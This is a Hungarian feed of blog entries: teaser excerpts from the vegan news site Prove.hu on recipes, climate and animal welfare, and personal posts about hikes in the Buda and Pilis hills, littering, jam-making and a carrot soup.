Környezetbarát közlekedési lehetőségeket és növényi alapú fogásokat kínáló étkezdéket javasol majd a világ legismertebb keresőjének térképes alkalmazása Billie Eilish legújabb turnéja alatt a rajongóknak. A Google és a vegán popénekes együttműködésének a célja, hogy a zenerajongók könnyebben tudjanak környezetbarát, felelős döntéseket hozni. Nem kell sokat törniük a fejüket azoknak a rajongóknak, akik Billie Eilish legújabb… The post Billie Eilish és a Google Maps együtt segítenek a koncertre járóknak fenntartható döntéseket hozni appeared first on Prove.hu.
5 szilvás recept, ami őszi hangulatot hoz a konyhádba
2024. október 6. Prove - a világ vegán szemmel
A szilvából számos finomság is készülhet, nemcsak édes, hanem akár sós ételek is. Az alábbi válogatásban találsz recepteket a szilvás papucstól kezdve a szilvás morzsasütin át egészen az aszalt szilvás gombafasírtig. Bár mindannyian tudjuk, hogy a legviccesebb nagybácsik a szilvás sütemények láttán mindig elsütik a rendkívül kreatív és szellemes ,,inkább főztél volna belőle pálinkát viccet,… The post 5 szilvás recept, ami őszi hangulatot hoz a konyhádba appeared first on Prove.hu.
Az elektromosautó-ipar megkapta azt, amit a vegán startupok aligha: ez lehet a lassú növekedés oka
2024. október 4. Prove - a világ vegán szemmel
Az elektromos autók és a növényi fehérjék széles körű elterjedése az éghajlatváltozás enyhítésének fontos eszközei lehetnének. Ám miközben számos hasonlóság is mutatkozik a két iparág között, a növényi fehérjék sok szempontból lemaradtak az elektromosautó-ipar mögött. Az utóbbi évek zöld technológiái közül valószínűleg a legtöbben az elektromos autókat említenék példaként. Az egykor kétkedéssel fogadott, sok szempontból… The post Az elektromosautó-ipar megkapta azt, amit a vegán startupok aligha: ez lehet a lassú növekedés oka appeared first on Prove.hu.
Háromszorosára nőhet a hőséghez köthető halálesetek száma Európában, ha nem változtatunk
2024. szeptember 26. Prove - a világ vegán szemmel
Százezernél is több ember eshet áldozatul a tikkasztó hőség által okozott egészségügyi komplikációknak Európában az évszázad végére. A kutatók szerint ez a mértékű növekedés sokkal magasabb, mint amennyivel kevesebb fagyhalálra lehet majd számítani a melegedő klíma következtében. Leginkább a mediterrán országok lesznek érintettek. Aki nem egy hűtőben töltötte az idei nyarat, az szinte naponta tapasztalhatta,… The post Háromszorosára nőhet a hőséghez köthető halálesetek száma Európában, ha nem változtatunk appeared first on Prove.hu.
Fenyvesek, édes gyantaillat, őszbe hajló erdők
2024. szeptember 22. Élj harmóniában
Fenyvesekkel, édes gyanta illattal, őszbe hajló erdőkkel övezett mai túránk helyszínéül,, az előző két nap pilisi túrái után a Budai-hegységet választottuk. Alapvetően a panorámás útvonalakat, napsütötte hegytetőket kedvelem. Nem nagyon szeretek völgyekben mászkálni, ahol nincs napsütés, nincsenek virágok, nincs igazán növényzet, nincs madárdal és nézhetem a fák gyökerét:) ... ahogy a nóta tartja, sűrű az erdő, nap sose járja , nem szól benne csalogány... Ám amikor csodálatos a napsütés és a tiszta az égbolt, ki nem hagynám, a panorámás kilátópontokat, mert messze jól el lehet látni. A Nagy - Kopasz a Budai hegység legmagasabb pontja és a tetején a Csergezán Pál kilátóból nagyon klassz a körpanoráma - jól látni a Budai hegység hegyeit, a Pilist - megnézhettünk az elmúlt két nap túráinak néhány pontját:) , ellátni a Mátra felé és a Gerecsére is . Már az oda felé vezető úton a Tarnai pihenő is egy fantasztikus természetes kilátópont. A Hidegvölgyi pihenőhöz érdemes akár gyerekekkel is kimenni - lehet padokon piknikezni és van büfé lehetőség is. Az első kilátópontig (tarnai pihenő) kisebbekkel is fel lehet menni. Ezen a terepen a nagyobb körtúra sem nehéz, nem megerőltető és nem igényel különösebb állóképeséget vagy technikai odafigyelést. Mai útvonal: Hidegvölgyi pihenő - Tarnai pihenő - Nagy-Kopasz - Fekete-hegy - Hidegvölgyi pihenő Csodaszép kirándulást kívánok:) KAti
Marhatelepeket vizsgáltak: nagyobb arányban van jelen a pusztító vírus, mint eddig gondoltuk
2024. szeptember 21. Prove - a világ vegán szemmel
Az amerikai gazdák félnek, hogy a pozitív teszteredményeket követően anyagi káruk keletkezik, ezért nem igazán tesztelnek. Pedig a madárinfluenza terjedésének megelőzése szempontjából fontos lenne a pontos képet ismerni. A szakértők kötelező teszteket és magasabb anyagi kompenzációt javasolnak, amivel talán motiválhatók lennének a vonakodó állattartók. Portálunk is több ízben foglalkozott már az amerikai marhatelepeken vészesen terjedő… The post Marhatelepeket vizsgáltak: nagyobb arányban van jelen a pusztító vírus, mint eddig gondoltuk appeared first on Prove.hu.
Megérkezett a vegán Nutella: különleges összetevővel helyettesítik benne a tejet
2024. szeptember 12. Prove - a világ vegán szemmel
A világ egyik legikonikusabb édességéről egy ideje már tudni lehetett, hogy növényi alapú verzióban is érkezni fog, de a pontos részleteket mindeddig homály fedte. Idén szeptemberben viszont lehullott a lepel az új termékről, és egyes európai országokban már hozzáférhetővé is vált a híres mogyorókrém, a Nutella vegán verziója. Szeptember negyedike valószínűleg piros betűs ünnepként vonul… The post Megérkezett a vegán Nutella: különleges összetevővel helyettesítik benne a tejet appeared first on Prove.hu.
Szívmelengető animációs kisfilm terjed: a Harry Potter-filmek sztárja narrálta
2024. szeptember 10. Prove - a világ vegán szemmel
Az animált rövidfilm, amelyet a Harry Potter-filmek vegán sztárja, Evanna Lynch narrál, egy állatmentést mutat be. A történetet valós események ihlették. ,,A világunk nem egy menedék - hangzik el a Generation Vegan (GenV) állatjogi szervezet legújabb kisfilmjében, amely egy állatmentés eseményeit meséli el. A történet szerint Indigo és édesanyja, Maria egy farmon élnek a mentett… The post Szívmelengető animációs kisfilm terjed: a Harry Potter-filmek sztárja narrálta appeared first on Prove.hu.
Soha nem értettem
2024. szeptember 1. Élj harmóniában
Soha nem értettem.... Valaki kimegy az erdőbe visz magával 1,5 literes ásványvizet vagy éppen egy 0,5 liter dobozos sört, felcipeli egy nagy hegy tetejére és megissza.... ezzel nincs semmi gond, De miért nem tud visszafelé levinni a hegytetőről 28g műanyag palackot vagy éppen 18g fémdobozt? :) Ez töredéke súly, mint amit felvitt. Na ez a rejtély számomra... Ha megy a cipelés fel a hegyre a nagyobb súllyal, mi az akadályozó tényező lefelé a pille súllyal... Egyre több szemetet látunk az erdőkben, hegytetőkön, réteken eldobálva. Az ember a természet része.. ez a mi saját környezetünk, ez vesz minket körül. A természetben lévő negatív változások sajnos hatást gyakorolnak az emberek életére is. Ha szét szennyezzük a termőföldet, a levegőt, a vizeinket, ne csodálkozzunk a megannyi légzőszervi, emésztőrendszeri, hormonrendszeri problémán, allergiákon, érzékenységeken... Ha egyre több betonnal vesszük körül magunkat, egyre több fát vágunk ki, a maradék fa közelében, meg szennyezzük a talajt, ne csodálkozzunk ha lassan egyre nagyobb a forróság, egyre több a környezeti ártalom és egyre élhetetlenebb a bolygó... Érdemes tudatosítani, amit teszünk a természettel azt magunkkal tesszük, lévén az ember a természettel kölcsönhatásban él, elválaszthatatlanok vagyunk. A túlfogyasztás, az állandó utazgatás, a felesleges szemetet generáló táplálkozás és életmód sajnos a saját és utódaink életét fogja megnehezíteni... Próbáld csökkenteni az ökológiai lábnyomod:) Kezd kis lépésekkel a saját otthonodban, családodban... Ne vásárolj felesleges élelmiszert és tárgyakat, fogyassz biot, fogyassz helyit, használj minél kevesebb csomagolt dolgot (kerüld a konzerv, mirelit, tetra pakos, agyoncsomagolt dolgokat), hordj természetes alapanyagú ruhákat, használj bio kozmetikumokat, az otthonodban is használj természetes anyagokat az építéshez és berendezéshez és természetes tisztítószereket, takarékoskodj az energiával, gyűjts esővizet, komposztálj, autózz kevesebbet, használd a tömegközlekedést vagy biciklizz, kerüld a repülést és inkább kevesebb utazással nyaralj. Néhány termék lebomlási ideje, talán ez segít abban mely termékeket érdemes választani a vásárlásnál. Aluminium doboz lebomlási ideje kb. 200-500 év Műanyag palack lebomlási ideje 450 év Zsebkendő, wc papír 2-4 hét Banánhéj 3-4 hét Narancshéj 6 hónap Cigarettacsikk 2 - 10 év Tejes és üdítős doboz 5 év Eldobható műanyag pohár 50 év Eldobható pelenka 500 év Üveg 1-2 millió év Élhetőbb, egészségesebb életet kívánok szeretettel Kati #ökológiailábnyom #ökológiaiábnyomcsökkentése #egészségmegőrzés #környezetszennyezés #tudatosság #környezetitudatosság #lebomlás #szemét #szemetelés #lebomlásiidő
Vissza a suliba: 30 vegán tízórai, ami az uzsonnásdobozba kerülhet
2024. augusztus 31. Prove - a világ vegán szemmel
Közeleg az iskolakezdés, és egyben az az idő is, amikor újra kicsit kreatívnak kell lenni, ha a gyereknek vegán tízórait szeretnénk csomagolni. Ezek a receptek segíthetnek, ha épp fogytán vagy a kreatív ötleteknek. Legyen szó tízórairól, ebédről vagy uzsonnáról, válogatós vagy édesszájú gyerekekről, ebben a válogatásban mindenféle ötletet találsz: az izgalmas szendvicsötletektől kezdve az egész… The post Vissza a suliba: 30 vegán tízórai, ami az uzsonnásdobozba kerülhet appeared first on Prove.hu.
Kínában 2030-ra kétszer annyi lehet a háziállatok száma, mint a gyermekeké
2024. augusztus 22. Prove - a világ vegán szemmel
Úgy látszik, megfordul a 2017-es trend, amikor a négy évesnél fiatalabb kínai gyermekek száma volt duplája a háziállatokénak. A Goldman Sachs jelentése szerint a csökkenő gyermekvállalási kedv és a megfelelő korban lévő nők számának csökkenése vezethet a háziállatok arányának növekedéséhez. Elképzelhető, hogy ha 2030 környékén sétálunk majd valamelyik kínai parkban, több fiatal párt látunk majd… The post Kínában 2030-ra kétszer annyi lehet a háziállatok száma, mint a gyermekeké appeared first on Prove.hu.
Isten éltessen Magyarország
2024. augusztus 20. Élj harmóniában
A mai nap egy szóval jellemezve... áldás Isten éltessen Magyarország Hihetetlen milyen szép kilátásai vannak kicsiny hazánknak A mai útvonaltervnél továbbra is figyelembe vettem, hogy az előző napi esőzések után, olyan útvonalon menjünk, ahol nincs sár és nincs túl sok pára. Továbbá, ha már kicsiny hazánk alapításának évfordulója van, hát ami belefér, had lássunk minél többet ebből a csodás országból Így terveztem végül mára az alábbi útvonalat... Dobogókő, Fekete-kő, Pilis-tető, Pilisszántói- kőfülke és Pilisszántó Boldogasszony Kápolna. Ez az útvonal amolyan kedvencem, mert hihetetlenül sok szép panorámában bővelkedik, szinte a Pilis hegységből minden irányba szét lehet nézni és nem csak a hivatalos kilátópontoknál, de sokszor a fák között lesve apró részletekben is lehet szépséget látni. Ráadásul nagyon nagy vágyam volt ma látni a pilisszántói Boldogasszony kápolnát, ami egy fantasztikus energiájú szakrális hely és mellette Makovecz Imre egyik izgalmas alkotása. Utunkat gyönyörű égi fények kísérték végig.. a felhők és a nap egymással folytatott táncának erdménye, amolyan égi áldásnak tűnt már a túra kezdetén is. Majd amikor folyamatosan hallottuk, hogy dörög az ég és hol jobbról, hol balról jöttek feketés fellegek kezdünk aggódni... már azon gondolkodtam, hogyan módosítsam a tervet és fájt a szívem, ha ma nem jutok el a kápolnához... de lám valamiféle égi csodának, Isteni gondoskodásnak köszönhetően nekünk néhány frissítő cseppen kívül semmi nem jutott az esőzésekből... Áldás volt ennyi szépet látni Magyarországból és áldás volt a napot a Boldogasszony kápolna atmoszférájával, hangulatával zárni. Kiegészítés... Akik ismernek tudják, Imádom ezt az országot fantasztikus a klímája, se nem túl hideg, se nem túl meleg barátságosak az élőlények - nálunk nem nagyon vannak gyilkos élőlények a hegyeink élettel teliek - nincsenek sziklás hófedte hegycsúcsok , ahol már nincs élet csodásak a tájaink és bebarangolhatóak nagyon sok thermál vizünk és fogyasztásra alkalmas vízünk van jó a termőtalajunk nagyon jó a földrajzi elhelyezkedésünk mélyek a történelmi és kulturális gyökereink És még lehetne sorolni... Látom a tendenciát arra, hogy sokan utálják az országot és elhagyják vagy biztatják a családtagjaikat, hogy tegyék meg. A politikai vezetést nem célszerű azonosítani a hazánkkal. Én nem politizálok, inkább csak szeretnék jobb ember lenni és jobbá tenni ezt a világot. Jómagam Szókratésszel értek egyet, így nem járok szavazni se. De sajnálom amikor valaki ego vagy pénz vagy politika vagy gazdasági megfontolásból itthagyja ezt a csodát. A politika néhány év vagy évtized... a döntés a következő generációk jövője, életkörülményei és gyökerei. Hálás vagyok az őseimnek, hogy nem hagyták el ezt a szépséges országot a nehézségek ellenére sem, és itt nőhettem fel, itt élhetek. Értem azt, aki ezt nem szereti és más klímára , tájra vágyik. Azokat viszont sajnálom akik ezen szuper dolgokat elhagyták és a családjuk következő nemzedékeinek lehet, hogy jobb anyagi körülményei lesznek, de nem ezen a csodahelyen élnek majd. Ha lenne egy ősi családi földbirtokom, csak azért mert a szomszédba valami dilis albérlő költözik néhány évre, aki számomra zavaró, nem hagynám el hiphop... a haza nem egy két választási ciklust jelent, hanem táptalaj és gyökerek a múltnak és jövő nemzedékének... egy nép, egy ember, de még egy fa stabilitását is a gyökerek adják
Búbánatvölgy
2024. augusztus 17. Élj harmóniában
Búbánatvölgy... jónéhány jóga elvonulást tartottunk itt, amolyan szívemnek kedves hely:) Csodaszép hegyekkel körbeölelt békés környezet. Ha valaki nyaralni, pihenni szeretne vagy csak piknikezni jó szívvel ajánlom. Mai túránk későn indult, mert Purusa délelőtt még tartott egy magánórát. Mire kiértünk tömegközlekedéssel Búbánatvölgybe 14 óra volt. Első célpont, a Hideglelős kereszt, ahol csodaszép a panoráma... nem csak a Duna szalagját, de a kis szigeteket is jól láthatjuk, és Szlovákiára és a Börzsönyre is szép a kilátás. Panorámás utunk folytatódott a hegyeken át (Sas-hegy, Vasarc, Őrhegy és Dobogó-hegy ) kimentünk a Róka sziklához vacsorázni:) A vacsora után, a Szilva-rét irányába haladtunk tovább és innen mentünk a Fári-kúthoz, majd a Majális forráshoz - aminek nagyon jó vize van. Minden kiürült vizespalackunkat meg is töltöttük friss forrásvízzel. Kb 15 éve itthon is mindig forrásvizet iszunk és azzal is főzünk. Szinte nem tudom már elképzelni, hogy akárcsak egy tésztát csapvízben főzzek ki. A túra vége Búbánatvölgy, már naplementében... A Kerek tó felett magasodó hegy tetejénél pedig odaérkezés után néhány perccel éppen kibukkant, feljött a Hold. Az egész útvonal tele van csodaszép panorámás pontokkal, fák közötti leselkedős kilátásokkal, tágas rétekkel és szerencsére már érik a szeder is: Még két lábon álló kecskét is láttunk Fotó mellékelve:) Bár még augusztus van, de az őszülés már megkezdődött... a sok szél, a nagy meleg és szárazság eredményeképpen az erdő sok helyen már sárgaszőnyeget terített elénk és a messzi látképeken is láttuk, hogy a hegyek sok helyen már kezdenek színesbe öltözni a következő szezon divatjának megfelelően.. Milyen gyönyörű Magyarország A Dunakanyar különösen csodálatos vidék, mert nem csak természetileg lenyűgöző, de történelmi, spirituális, kultúrális programokat is bőven kínál.
A légszennyezés az időskori önállóságot is befolyásolja
2024. augusztus 12. Prove - a világ vegán szemmel
Amerikai kutatók arra a következtetésre jutottak, hogy a szennyezett levegőnek kitett emberek hamarabb szorulnak gondozásra időskorukra. A tanulmány rávilágít, hogy az önállóság elvesztésével a közlekedés által okozott légszennyezés hozható leginkább összefüggésbe. Az idő előtt gondozásra szoruló idősek egészségügyi ellátása komoly terhet ró a társadalomra. Egyre sűrűbben vizsgált téma, hogy a légszennyezés milyen változatos módokon befolyásolja… The post A légszennyezés az időskori önállóságot is befolyásolja appeared first on Prove.hu.
Éreznek fájdalmat a növények?
2024. augusztus 4. Prove - a világ vegán szemmel
Nem sok kétely merül fel azzal kapcsolatban a tudósok és a laikusok körében sem, szenvedhetnek-e, képesek-e ilyen érzésekre az állatok. Az már megosztóbb téma, hogy a növények éreznek-e fájdalmat. Ha vegán életmódot követsz, nyilván tudod, hogy közel minden új ismeretséghez és ismerkedéshez társul egy bizonyos kérdés. Ez az a kérdés, amely nagy valószínűséggel merül fel… The post Éreznek fájdalmat a növények? appeared first on Prove.hu.
Netproblémák, fizetési fennakadások - ezeket okozhatja a sarki jég olvadása
2024. augusztus 1. Prove - a világ vegán szemmel
Modern mindennapok részét képező, pontos időmérésen alapuló folyamatokat is megzavarhat egy kutatói csoport szerint a jövőben a sarki jég olvadása. Megállapították, a klímaváltozás a Föld forgásának tempóját is módosítja, minimálisan ugyan, de meghosszabbítva ezzel a napokat. Egy napokban bekövetkezett informatikai hiba komoly problémát okozott egyszerre a világ számos pontján. Fennakadásokról számoltak be repülőtereken, bankokban, de… The post Netproblémák, fizetési fennakadások - ezeket okozhatja a sarki jég olvadása appeared first on Prove.hu.
Trump teljes hátraarcot tervez környezetvédelmi szempontból
2024. július 30. Prove - a világ vegán szemmel
Donald Trump republikánus elnökjelölt nem kertelt azzal kapcsolatban, milyen környezetvédelmi politika várható újraválasztása esetén. Az aktuális országvezetés klímaügyi intézkedéseit visszavonná, a Környezetvédelmi Ügynökség hatáskörét csökkentené, és ismét felpörgetné az olaj- és gázkitermelést. Néhány hónappal 2017-es beiktatása után Donald Trump volt amerikai elnök drasztikus lépésre szánta el magát. Bejelentette, hogy az Egyesült Államok kilép a párizsi… The post Trump teljes hátraarcot tervez környezetvédelmi szempontból appeared first on Prove.hu.
9 különleges pite a gluténmentes almástól a spenótos-fokhagymásig
2024. július 18. Prove - a világ vegán szemmel
Meggyes, spárgás, sütőtökös, karamellás-banános: ez csak néhány azokból a piteötletekből, amikkel ebben a válogatásban találkozhatsz. Mindegy, hogy épp sósra vagy édesre, klasszikusra vagy nem mindennapi kombinációra vágysz, e kilenc pite közül biztosan találsz olyat, ami elnyeri a tetszésed. A pite egy olyan sütemény, amely generációk óta összehozza a családot és a barátokat a különböző eseményeken.… The post 9 különleges pite a gluténmentes almástól a spenótos-fokhagymásig appeared first on Prove.hu.
Állatkertből a sztyeppére: 200 év után visszatérhettek a vadlovak Kazahsztánba
2024. június 21. Prove - a világ vegán szemmel
Az ázsiai vadlovak közel 200 éve tűntek el természetes élőhelyükről az emberi tevékenység hatására. A világ utolsó ma is élő vadlóalfaját most a Prágai Állatkert próbálja visszatelepíteni a kazah sztyeppékre. Az ázsiai vadlovak, más néven Przewalski-lovak valaha Közép-Ázsia füves sztyeppéin éltek. A túlvadászat, az emberi terjeszkedés miatti élőhelyvesztés, az állatkertek számára való befogás és a… The post Állatkertből a sztyeppére: 200 év után visszatérhettek a vadlovak Kazahsztánba appeared first on Prove.hu.
Az anyai ösztönöknek köszönheti a vidrakölyök az életét
2024. június 12. Prove - a világ vegán szemmel
Egy forgalmas útról, az autók közül mentett ki egy vidrakölyköt egy várandós amerikai nő. A leendő édesanya először azt hitte, macskakölyköt lát az úttest közepén. Miután közelebb ment, azután derült csak ki, hogy a bajba jutott csöppség egy újszülött vidra. Hatalmas szerencséje volt annak a vidrakölyöknek, akit egy aggódó autós mentett meg egy forgalmas útról.… The post Az anyai ösztönöknek köszönheti a vidrakölyök az életét appeared first on Prove.hu.
Megszólalt az élve megperzselt disznó Budapesten, az állatjogi világnapon
2024. június 6. Prove - a világ vegán szemmel
Megemlékeztek a kizsákmányolt állatokról az állatjogi világnap alkalmából a Vegán Aktivisták Magyarország Egyesület tagjai. A budai Várnegyedben hívták fel a figyelmet az állatok szenvedéseire. Az érdeklődők között pedig olyan is volt, akit megríkattak a hallottak. Immár harmadik alkalommal tartottak megemlékezést Magyarországon a nemzetközi állatjogi világnap apropóján. Az esemény budapesti szervezését a Vegán Aktivisták Magyarország Egyesület… The post Megszólalt az élve megperzselt disznó Budapesten, az állatjogi világnapon appeared first on Prove.hu.
Athén fellépett a tengerek védelmében, mire Ankara bedühödött
2024. június 1. Prove - a világ vegán szemmel
Törökország szerint hazugság, hogy Görögország a tengerek védelmében hozna létre két új védett területet az Égei- és a Jón-tengeren. Az ankarai külügyminisztérium szerint a háttérben valójában geopolitikai okok húzódnak. Kiriákosz Micotákisz görög miniszterelnök ugyanakkor egyéb lépéseket is beharangozott a tengeri élővilág megóvása érdekében - ezeket az intézkedéseket Törökország nem kommentálta. A görög-török viszálykodás világhírű, a… The post Athén fellépett a tengerek védelmében, mire Ankara bedühödött appeared first on Prove.hu.
Van egy jó eperdzsem recepted?
Gyakori kérdés a főzős csoportokban szezon kezdetével. Nézetem szerint a dzsemeknek és lekvároknak nincs receptje, mert a készítés módját kell megérteni, és ha ez megvan, mindenki kiválaszthatja a neki megfelelőt, majd elkészítheti a saját szájízére. Mit szeretnél, dzsemet vagy lekvárt? A lekvár Hosszú ideig fő, hiszen az a lényege, hogy a felhasznált gyümölcs víztartalmát elpárologtatjuk a főzés során. Éppen ezért intenzívebb az íze, mint a dzsemnek, viszont a végeredmény kisebb mennyiség lesz. Egész gyümölcsből vagy nagyobbra vágott gyümölcsből készül, így maradhatnak benne gyümölcsdarabok. A tennivalód egyszerű: a megmosott, megtisztított gyümölcsöt lábosba rakod és lass tűzön, kevergetve addig főzöd, amíg a kívánt sűrűséget eléri. Tartósításához hőkezelésre van szükség, például száraz dunsztra vagy befőző automatára. A dzsem Elég rövid ideig főzni, felforralás után pár percig, hiszen a sűrítéshez gyümölcspektint vagy dzsemfixet használunk, így nem párologtatjuk el a gyümölcs víztartalmát. Ennek köszönhetően mennyiségre több lesz, mint a lekvár, de az íze kissé kevésbé intenzív. Általában turmixolják, így nem marad benne gyümölcsdarab. Nincs szükség befőzőautomatára, a dzsemfixek csomagolásán leírt módon járunk el. Lekvárok, dzsemek ízesítése Édesítés Egyéni, hogy ki mennyire szereti édesen. Vannak, akik semmilyen édesítőt nem használnak, erre is lehetőség van. Meg kell jegyezni, hogy ebben az esetben a lekvár a jó választás, mert a főzéssel való sűrítéstől jóval édesebb. Ha édesíteni szeretnéd, többféle lehetőséged van: tehetsz bele cukrot, nádcukrot, de akár eritritet vagy negyedannyi cukorhelyettesítőt is. Fűszerezés Vannak, akik szeretnek fűszert vagy más ízesítőt adni a lekvárokhoz, dzsemekhez, ez megint szabadon választott. A fahéj és a szegfűszeg remekül passzol minden gyümölcshöz, de használhatsz akár friss mentát vagy citromfüvet, az epret pedig nagyon feldobja egy-két tányér bodzavirág. Klasszikus párosítás a csoki és a meggy vagy a fehércsokis málna. Tartósítás Ha dzsemet főzöl, egyszerű dolgod van, a pektin vagy dzsemfix csomagolásán olvasható utasítás szerint jársz el. Lekvárfőzés esetén javaslom a száraz dunszt eljárást, ami azt jelenti, hogy a forró lekvárt üvegekbe rakod, jól lezárod, majd az üvegeket egy nagyobb lábosba vagy dobozba helyezed és alaposan betakargatod egy-két pléddel. Legközelebb csak 3 nap múlva nézel rá és szeded ki. Ha van befőzőautomatád, az üvegeket az automata megfelelő programjával hőkezeled. Végezetül szeretnék nektek átadni egy tippet, amelyet Kaldeneker György séf, a Kaldeneker Lekvárosház tulajdonosa osztott meg velem: tegyél a dzsembe egy pici citromsavat, hogy megőrizd a gyümölcs friss színét.
Már egy apró étrendbeli változással is csökkenthetők a merevedési zavarok
2024. május 13. Prove - a világ vegán szemmel
Nemcsak a keringési zavartól szenvedők, de a prosztataműtéten átesettek is jobban teljesítenek az ágyban, ha az étrendjük több növényi alapú ételt tartalmaz. A New York University urológusa szerint az orvosoknak a növényi étrend felé kellene terelniük a betegeiket. A merevedési zavar ellen ugyanis már a kismértékű étrendváltozás is hatásos lehet. A növényi alapú táplálkozás egyre… The post Már egy apró étrendbeli változással is csökkenthetők a merevedési zavarok appeared first on Prove.hu.
Átfogó elemzés bizonyítja: a vegán alternatívák akkor is előnyösebbek, ha feldolgozottak
2024. május 9. Prove - a világ vegán szemmel
A London School of Hygiene and Tropical Medicine kutatói szerint az ő szisztematikus áttekintésük az első, amely a növényi alternatívák előnyeire vonatkozó szakirodalom eredményeit elemzi. A környezettudatos és a fenntartható étkezés elterjedésével nemcsak a teljes értékű növényi élelmiszerek, de a feldolgozott, alternatív fehérjeforrások is egyre többször kerülnek a vizsgálódás középpontjába. Mivel számos termék feldolgozott, ami… The post Átfogó elemzés bizonyítja: a vegán alternatívák akkor is előnyösebbek, ha feldolgozottak appeared first on Prove.hu.
A nagyipari állattartásban egyetlen nap sem lehet anyák napja
2024. május 5. Prove - a világ vegán szemmel
Ezen az anyák napján gondolj arra is, milyen borzalmakkal szembesülnek az anyák a nagyipari állattartásban. A gyermek és szülő elválasztása itt nem is kérdés. A profitmaximalizálásba nem férnek bele az anyai érzelmek és a gyengéd gondoskodás. Mindig jól az eszünkbe véssük: csak el ne felejtsük anyák napja alkalmából köszönteni édesanyánkat, nagymamánkat, esetleg keresztanyánkat, nevelőanyánkat. Veszünk… The post A nagyipari állattartásban egyetlen nap sem lehet anyák napja appeared first on Prove.hu.
Áprilisi délután
2024. április 28. Élj harmóniában
A múlt heti hideg után, sok széllel megérkezett a meleg ... minden gyönyörű zöld... a fák lomkoronája teljes pompában fedi be a tájat... az erdő hihetetlenül illatos , hol a mézédes illat, hol az üdezöld friss illat, hol a gyantás fenyő, hol valami fanyar illat kényezteti a szaglásom. Vacsora újra a hegytetőn kakukkfű csoportok között A vacsora receptjét ami csupa friss hazai biozöldségből készült, megosztottam az Élj harmóniában- megújulás, egészség, életmód csoportban. Május 1 szuper lehetőség, hogy a természetben töltődj szeretettel Kati
Működik a Lidl taktikája: így sikerült növelni a vegán termékek értékesítését
2024. április 23. Prove - a világ vegán szemmel
A német Lidl a napokban jelentette be, hogy az árparitás bevezetését követően nagymértékben nőtt a vegán termékek értékesítése. A fehérjeátállásról szóló rendezvényen száznál is több piaci résztvevő, tudós és politikus vett részt. A fő téma a fehérjetermelés jövője és az állatjólét volt. Az áruházlánc továbbra is elkötelezett a fenntartható élelmiszerek mellett. A Lidl a fehérjeátállásról… The post Működik a Lidl taktikája: így sikerült növelni a vegán termékek értékesítését appeared first on Prove.hu.
Zöldséges csicseriborsó lepény: a tökéletes gluténmentes sós reggeli
2024. április 19. Prove - a világ vegán szemmel
Ha gluténmentes és nem édes reggeliötleteket keresel, akkor ez a csicseriborsó lepény lesz az új kedvenced: bizony, van élet a pirítóson és a zabkásán túl is. Ráadásul ezzel a recepttel úgy vihetsz egy kis színt a reggelirepertoárodba, hogy közben jót is teszel magaddal: a csicseriborsó lepényben akár négy-ötféle zöldséget is el lehet ,,rejteni, amitől nagyon… The post Zöldséges csicseriborsó lepény: a tökéletes gluténmentes sós reggeli appeared first on Prove.hu.
Félre az illúziókkal: ilyen sovány, kopasz tojótyúk ,,adja a magyar tojást
2024. április 10. Prove - a világ vegán szemmel
Soha nem látott korábban napfényt vagy füvet az a tizennégy lesoványodott, kizsigerelt tojótyúk, akiket a Junior Kisállat Rezervátum mentett meg a tojásiparból. Az üzemekben ez sokszor általános állapotnak tekinthető. Az Európai Unió pedig az állatjóléti intézkedésekkel kapcsolatban még mindig hezitál. Csont és bőr - sokszor nevezik így azokat, akik nagyon soványak. A Junior Kisállat Rezervátum… The post Félre az illúziókkal: ilyen sovány, kopasz tojótyúk ,,adja a magyar tojást appeared first on Prove.hu.
Növényi alapú, 97 százalékban lebomló műanyaggal kísérleteznek
2024. április 4. Prove - a világ vegán szemmel
Forradalmi módon venné fel a harcot a mindent beborító mikroműanyagokkal egy tudóscsoport: növényi alapú műanyaggal rukkoltak elő. A projekt még folyamatban van, de a fejlesztők szerint az eddigi eredmények kecsegtetők. TPU-FC1 - így hívják az új biopolimert, amely akár teljesen fel is forgathatja az általános vélekedést a műanyagok használatával kapcsolatban. Jelen állás szerint a fenntarthatóság… The post Növényi alapú, 97 százalékban lebomló műanyaggal kísérleteznek appeared first on Prove.hu.
Tavaszi illat, szín és látvány parádé
2024. március 30. Élj harmóniában
Csodálatos színes tavaszi illat, szín és látvány parádé. Madárfütty, erdő illat, zöldellő rétek. E heti felhozatal a képeken Az odvas keltike mézédes illatától megrészegülve heverészhetünk a napsütésben... ez számomra mindig egy varázslatos, mesebeli érzés. Megérkezett az igazán meleg idő, ami számomra kellemes túrázáshoz Mindannyian egyediek vagyunk, van aki a szelet szereti, van aki nem... van aki imádja a meleget, mások menekülnek a nyári hőség elöl. Az évszakok váltakozása, lehetős?get biztosit minden féle élvezette, látványra, hő, csapadék és napsugárzás megtapasztalására. Annyira jó olyan országban élni, ahol ennyi féle évszaki sajátosság van. szeretettel Kati #tavasz #napsütés #természet #ébredezőtermészet #csodaszép #gyönyörű #virágok #fák #levelek #újjászületés #
Állatjóléti intézkedéseket várnának, de csak üres ígéreteket kapnak az európaiak
2024. március 30. Prove - a világ vegán szemmel
Az uniós állampolgárok fontosnak tartanák a szigorúbb állatjóléti intézkedések bevezetését egy felmérés alapján. A gazdák azonban általánosságban ennek az ellenkezőjét szeretnék, túl nagy tehernek éreznék a szigorítást. Az Európai Bizottság a két ellentétes akarat szorításában egyelőre későbbre halasztotta a tervezett állatjóléti szigorítások bevezetését. Az európai fogyasztók többsége indokoltnak látná, hogy az Európai Unión belül szigorítsák… The post Állatjóléti intézkedéseket várnának, de csak üres ígéreteket kapnak az európaiak appeared first on Prove.hu.
Gyömbéres sárgarépa krémleves
A környezetünkben sokan köhögnek vagy betegek, így szerintem tavasszal is megállja a helyét ez a gyömbérrel dúsított krémleves. Hozzávalók: 50 dkg sárgarépa 1 közepes édesburgonya 1 nagy fej vöröshagyma 3 gerezd fokhagyma kb 1,5×1,5 cm-es gyömbér 1 ek. olaj szerecsendió, szegfűbors, barna cukor, sörélesztőpehely, csilipehely, só – ízlés szerint 1 ek. citromlé 1 l víz […]
Húsvéti dekoráció, tojásfestés vegánként? Ez is megoldható!
2024. március 23. Prove - a világ vegán szemmel
A vegán húsvéti dekoráció témakörébe belefér még a tojásfestés is. Nem mindegy persze, milyen alapot használsz, de könnyen beszerezhető már fenntartható alternatíva is. Ha azt mondom, húsvéti dekoráció, biztos vagyok benne, hogy az első, ami eszedbe jut, a tojásfestés. Máig látom magam előtt, ahogy édesanyám kivörösödött arccal, erőlködve fújja ki a tojásokat, és reménykedve megkérdezi,… The post Húsvéti dekoráció, tojásfestés vegánként? Ez is megoldható! appeared first on Prove.hu.
